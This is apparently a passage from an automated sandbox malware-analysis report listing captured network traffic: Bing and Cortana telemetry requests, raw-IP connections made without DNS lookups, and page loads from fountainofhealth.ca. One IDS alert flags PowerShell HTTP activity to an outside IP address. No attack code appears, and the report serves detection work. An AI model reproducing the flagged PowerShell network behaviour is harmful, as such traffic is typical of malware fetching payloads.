Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=0638cfbb5a9041079ce3b71fd1168ee9 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
Source: global traffic HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-userageclass: Unknownaccept-encoding:
Source: global traffic HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926312x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 545012EC6AF64F449D402DDDF0620E33x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-userageclass: Unknownaccept-encoding:
Source: global traffic HTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=5cb3c615592b43b52b10d4befb60d1c1&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22s-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:864,%22T%22:1},{%22RequestID%22:%22s-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:169,%22T%22:1},{%22RequestID%22:%223e8c2c37b90301f8e8025e3b8e4361cf%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:61998,%22T%22:128,%22Rip%22:%22%20191.101.61.0%22,%22Ep%22:%22%20fra21prdapp03%22,%22Mn%22:%22%20fra21app033%22},{%22RequestID%22:%223e8c2c37b90301f8e8025e3b8e4361cf%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:312,%22T%22:128,%22Rip%22:%22%20191.101.61.0%22,%22Ep%22:%22%20fra21prdapp03%22,%22Mn%22:%22%20fra21app033%22},{%22RequestID%22:%2219f550f74e18dcc29dd96863598fc7e4%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:1699,%22T%22:128,%22Rip%22:%22%20191.101.61.0%22,%22Ep%22:%22%20akl02prdapp01%22,%22Mn%22:%22%20akl02app011%22},{%22RequestID%22:%2219f550f74e18dcc29dd96863598fc7e4%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:295,%22T%22:128,%22Rip%22:%22%20191.101.61.0%22,%22Ep%22:%22%20akl02prdapp01%22,%22Mn%22:%22%20akl02app011%22}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityu
Source: global traffic HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1747926382x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 9A34E62F5FF5404283834A63CEC5B725x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-userageclass: Unknownaccept-encoding:
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:49795 -> 35.206.121.228:443
Source: unknown TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown TCP traffic detected without corresponding DNS query: 184.86.251.25
Source: unknown TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /en HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /modules/ajax_loader/css/throbber-general.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/views/css/views-responsive-grid.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/core.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/controlgroup.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/resizable.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/checkboxradio.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/button.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/dialog.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/align.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/fieldgroup.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /npm/@unicorn-fail/drupal-bootstrap-styles@0.0.2/dist/3.4.0/8.x-3.x/drupal-bootstrap.css HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/container-inline.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/clearfix.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/details.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/hidden.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/item-list.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/js.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/nowrap.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/position-container.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/progress.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/reset-appearance.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/css/bootstrap.css HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
